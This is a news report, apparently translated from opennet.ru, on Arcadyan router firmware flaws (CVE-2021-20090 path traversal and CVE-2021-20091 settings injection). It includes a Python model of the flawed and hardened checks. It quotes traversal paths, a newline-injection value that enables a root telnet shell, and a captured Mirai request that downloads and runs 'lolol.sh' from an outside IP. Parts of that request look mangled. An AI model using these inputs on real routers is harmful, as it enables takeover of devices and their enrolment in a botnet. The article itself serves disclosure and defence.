Vulnerability in home routers affecting 17 manufacturers

A massive attack has been recorded on the network against home routers whose firmware uses an HTTP server implementation from Arcadyan. To gain control of the devices, a combination of two vulnerabilities is used that allows remote execution of arbitrary code with root privileges. The problem affects a fairly wide range of ADSL routers from Arcadyan, ASUS and Buffalo, as well as devices supplied under the brands of Beeline (the problem is confirmed in the Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone and other telecom operators. It is noted that the problem has been present in Arcadyan firmware for more than 10 years and in that time has managed to migrate to at least 20 device models from 17 different manufacturers.

The first vulnerability, CVE-2021-20090, makes it possible to access any web interface script without authentication. The essence of the vulnerability is that, in the web interface, some directories through which images, CSS files and JavaScript scripts are served are accessible without authentication. The directories for which unauthenticated access is allowed are checked against an initial mask, that is, against the start of the path. Explicit "../" sequences in paths, used to move to parent directories, are blocked by the firmware, but the "..%2f" combination is let through. It is therefore possible to open protected pages by sending requests such as "http://192.168.1.1/images/..%2findex.htm".

The second vulnerability, CVE-2021-20091, allows an authenticated user to change the device's system settings by sending specially formatted parameters to the apply_abstract.cgi script, which does not check the parameters for the presence of a newline character. For example, when performing a ping operation, an attacker can specify the value "192.168.1.2%0AARC_SYS_TelnetdEnable=1" in the field with the IP address being checked, and the script, when creating the settings file /tmp/etc/config/.glbcfg, will write the line "AARC_SYS_TelnetdEnable=1" into it, which activates the telnetd server, which in turn provides unrestricted command shell access with root privileges. Similarly, by setting the AARC_SYS parameter, any code can be executed on the system. The first vulnerability makes it possible to run the problematic script without authentication by accessing it as "/images/..%2fapply_abstract.cgi".
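Added example, not part of the original article and not Arcadyan's code: a Python model of the two checks described above (the prefix mask behind CVE-2021-20090 and the missing newline check behind CVE-2021-20091), each beside a hardened form. The prefix list, the `ping_ip` key and all function names are assumptions made for illustration.

```python
import posixpath
import re
from urllib.parse import unquote

# Assumption: login-free directories, modelled on the article's "/images/" example.
PUBLIC_PREFIXES = ("/images/", "/css/", "/js/")
# Printable ASCII only, so CR and LF can never reach the settings file.
SAFE_VALUE = re.compile(r"[\x20-\x7e]{1,64}")

def flawed_is_public(raw_path):
    """The check as the article describes it: literal "../" is blocked, then the
    raw, still-encoded path is matched against the public prefixes."""
    return "../" not in raw_path and raw_path.startswith(PUBLIC_PREFIXES)

def hardened_is_public(raw_path):
    """Decode until stable, normalise, and only then apply the prefix mask."""
    path = raw_path
    for _ in range(3):                       # bounded, so %252f is caught too
        path, previous = unquote(path), path
        if path == previous:
            break
    else:
        return False                         # still changing after 3 rounds: reject
    if "\\" in path or "\x00" in path:
        return False
    return posixpath.normpath(path).startswith(PUBLIC_PREFIXES)

def render_settings(settings, validate):
    """Write key=value lines the way a line-based settings file stores them."""
    lines = []
    for key, value in settings.items():
        if validate and not SAFE_VALUE.fullmatch(value):
            raise ValueError(f"illegal character in value for {key}")
        lines.append(f"{key}={value}\n")
    return "".join(lines)

def parse_settings(text):
    """Read the file back line by line, as a consumer of the file would."""
    return dict(line.split("=", 1) for line in text.splitlines() if "=" in line)

# Constructed inputs, built from the strings quoted in the article.
TRAVERSAL = "/images/..%2findex.htm"
PING_FIELD = unquote("192.168.1.2%0AARC_SYS_TelnetdEnable=1")

if __name__ == "__main__":
    print(flawed_is_public(TRAVERSAL), hardened_is_public(TRAVERSAL))
    # "ping_ip" is a hypothetical key name; one submitted field becomes two settings.
    print(parse_settings(render_settings({"ping_ip": PING_FIELD}, validate=False)))
```

The hardened path check applies the mask to the path that would actually be served, and the hardened writer rejects the value before anything is written rather than trying to strip the newline.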

To exploit the vulnerabilities, an attacker must be able to send a request to the network port on which the web interface runs. Judging by the dynamics of the attack's spread, many operators leave access to their devices open from the external network to simplify diagnosis of problems by the support service. If access to the interface is restricted to the internal network only, the attack can be carried out from an external network using the "DNS rebinding" technique. The vulnerabilities are already being actively used to connect routers to the Mirai botnet:

POST /images/..%2fapply_abstract.cgi HTTP/1.1
Connection: close
User-Agent: Dark

action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_ping.212.192.241.7. 0%1A ARC_SYS_TelnetdEnable=0& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; curl+-O+http://777/lolol.sh; chmod+0+lol.sh; sh+lolol.sh&ARC_ping_status=4&TMP_Ping_Type=XNUMX

Source: opennet.ru
